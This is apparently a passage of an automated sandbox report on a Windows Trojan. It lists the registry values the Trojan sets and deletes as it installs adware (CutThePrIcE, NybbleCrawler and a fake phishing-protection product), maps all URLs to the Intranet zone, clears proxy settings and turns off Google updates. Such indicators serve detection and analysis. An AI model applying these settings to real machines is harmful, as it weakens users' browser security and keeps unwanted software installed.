"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 45 4D 19 EE 1D E8 01 14 18 04 96 41 37 81 7C"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE security zone settings to map all local web nodes that have no dots in their names and are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutThePrIcE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"
"InstallDate" = "20140701"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutThePrIcE"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 C0 A7 2F 84 63 D6 00 93 4F 6E 60 95 C8 6E CE"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web nodes whose names contain no dots and which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutaThePrice"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

"UpdateDefault" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutaThePrice"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 03 1F 34 56 16 EB 31 95 6F 64 32 0F 76 D4 A4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web nodes whose names contain no dots and which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 B5 29 E0 BD 96 28 92 29 8E B0 C9 E8 09 C8 F5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Web Protector Reliable Phishing Protection"
"DisplayName" = "Web Protector Reliable Phishing Protection"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web nodes whose names contain no dots and which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process NybbleCrawler.xyz.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"CategoryName" = "NybbleCrawler"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"3c09c42b" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"

